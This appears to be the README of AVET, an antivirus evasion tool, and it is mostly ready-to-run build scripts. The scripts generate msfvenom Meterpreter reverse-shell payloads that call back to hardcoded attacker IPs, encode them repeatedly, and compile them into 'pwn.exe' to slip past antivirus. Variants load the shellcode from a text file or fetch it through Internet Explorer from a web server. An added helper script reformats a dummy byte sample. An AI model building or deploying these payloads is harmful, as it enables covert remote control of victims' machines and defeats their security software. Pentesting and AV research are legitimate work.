AVET
AVET is an AntiVirus Evasion Tool, which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques.
What & Why:
- when running an exe file made with msfvenom and similar tools, the exe file will often be detected by the antivirus software
- avet is an antivirus evasion tool targeting Windows machines with executable files
- assembly shellcodes can be used
- make_avet can be used for configuring the source code
- with make_avet you can load ASCII encoded shellcodes from a text file or from a web server; it also applies an AV evasion technique to avoid sandboxing and emulation
- for ASCII encoding the shellcode, the tools format.sh and sh_format are included
- this readme applies to Kali 2 (64bit) and tdm-gcc
Changelog v2.4.1
- added has_process_exit
- added quick and dirty support for compiling with C++
Installation
git clone https://github.com/govolution/avet.git
cd avet
./avet_fabric.py
Usage
Compile the shellcode into the .exe file and use -F as the evasion technique. At the time of writing this example gets past most antivirus engines. Here -E is used additionally to encode the shellcode as ASCII.
#!/bin/bash
# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# in addition to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, the -f compiles the shellcode to the exe file, the -F is for the AV sandbox evasion, -E will encode the shellcode as ASCII
./make_avet -f scclean.txt -F -E
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
rm scclean.txt && echo "" > defs.h
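The "format the shellcode for make_avet" step above is not explained further. As an added illustration (not AVET's own format.sh or sh_format, which may use a different intermediate format), the following script shows the kind of transformation involved: msfvenom's -f c output is reduced to a single line of hex digits, two per byte, and the result is checked before it would be handed to make_avet. The sample C output, the function names and the checks are assumptions for this example; the sample is a constructed 12-byte dummy, not a working payload.

```bash
#!/bin/bash
# Added example, not part of AVET: what "formatting the shellcode for make_avet"
# amounts to, written out so the intermediate text can be inspected and checked.
set -eu

# Constructed stand-in for "msfvenom ... -f c" output. NOT a working payload,
# just 12 bytes laid out the way msfvenom prints a C array (lowercase hex).
SAMPLE_C_OUTPUT='unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89"
"\xe5\x31\xc0\x64";'

# Reduce msfvenom C output to one line of hex digits: keep only the quoted
# string lines, drop the quotes, the trailing ';' and every "\x" prefix.
c_to_hex() {
    grep '^"' | sed -e 's/^"//' -e 's/";\{0,1\}$//' -e 's/\\x//g' | tr -d '\n'
}

# Inverse: wrap a hex string back into "\xNN" form so a round trip can be compared.
hex_to_c() {
    tr -d '\n' | sed 's/../\\x&/g'
}

# Sanity check a build script should run before calling make_avet: an empty
# sc.txt (e.g. msfvenom failed) or stray characters would otherwise be compiled
# in silently. The text must be a non-empty, even-length run of hex digits.
is_clean_hex() {
    printf '%s' "$1" | grep -Eq '^([0-9a-f]{2})+$'
}

# Number of shellcode bytes encoded in a hex string.
hex_byte_count() {
    printf '%s' "$(( ${#1} / 2 ))"
}

# Demo: format the sample, validate it and report the payload size.
HEX=$(printf '%s\n' "$SAMPLE_C_OUTPUT" | c_to_hex)
if ! is_clean_hex "$HEX"; then
    echo "formatting failed: '$HEX' is not clean hex" >&2
    exit 1
fi
echo "formatted payload: $HEX ($(hex_byte_count "$HEX") bytes)"
```

In a real build you would feed the output of `msfvenom ... -f c` through `c_to_hex` in place of the sample, compare `hex_byte_count` against the "Payload size" msfvenom prints, and abort the build when `is_clean_hex` fails, instead of discovering an empty payload only when pwn.exe does nothing on the target.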
Usage without -E. The ASCII encoder does not have to be used; here is how to compile without -E. In this example the evasion technique is quite simple: the shellcode is encoded with 20 rounds of shikata_ga_nai, which is often enough to do the trick. The effect is similar to a junk loop: so much code has to be executed before the payload appears that the AV engine's emulator gives up and lets the file pass.
#!/bin/bash
# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded 20 rounds with shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.128 lport=443 -e x86/shikata_ga_nai -i 20 -f c -a x86 --platform Windows > sc.txt
# call make_avet, the sandbox escape is due to the many rounds of decoding the shellcode
./make_avet -f sc.txt
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
echo "" > defs.h
Notably, for a 64-bit payload no further evasion technique has been needed so far. -F should work here too.
#!/bin/bash
# simple example script for building the .exe file
. build/global_win64.sh
# make meterpreter reverse payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.116.132 lport=443 -f c --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, compile
./make_avet -f scclean.txt -X -E
$win64_compiler -o pwn.exe avet.c
# cleanup
rm scclean.txt && echo "" > defs.h
Load from a file: Here the ASCII encoder is needed. The executable loads the payload from a text file at runtime, which is enough for most AV engines to let the payload execute.
#!/bin/bash
# simple example script for building the .exe file that loads the payload from a given text file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# in addition to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.116.132 lport=443 -e x86/shikata_ga_nai -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > thepayload.txt && rm sc.txt
# call make_avet, the -l compiles the filename of the payload file into the .exe file
./make_avet -l thepayload.txt -E
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
#echo "" > defs.h
# now you can run your program with pwn.exe; thepayload.txt has to be in the same dir
Load with Internet Explorer: This is a bit tricky and might not work on the first try. The executable starts Internet Explorer and downloads the ASCII encoded shellcode. The shellcode is then read from the IE cache directory and, if found, executed. This was tested on Windows 7 only.
#!/bin/bash
# simple example script for building the .exe file
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# in addition to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.2.105 lport=443 -e x86/shikata_ga_nai -i 2 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, compile
./make_avet -E -u 192.168.2.105/scclean.txt
$win32_compiler -o pwn.exe avet.c
# cleanup
echo " " > defs.h
# now copy scclean.txt to your web root and start pwn.exe on the target
Copyright (C) govolution
Source: https://github.com/govolution/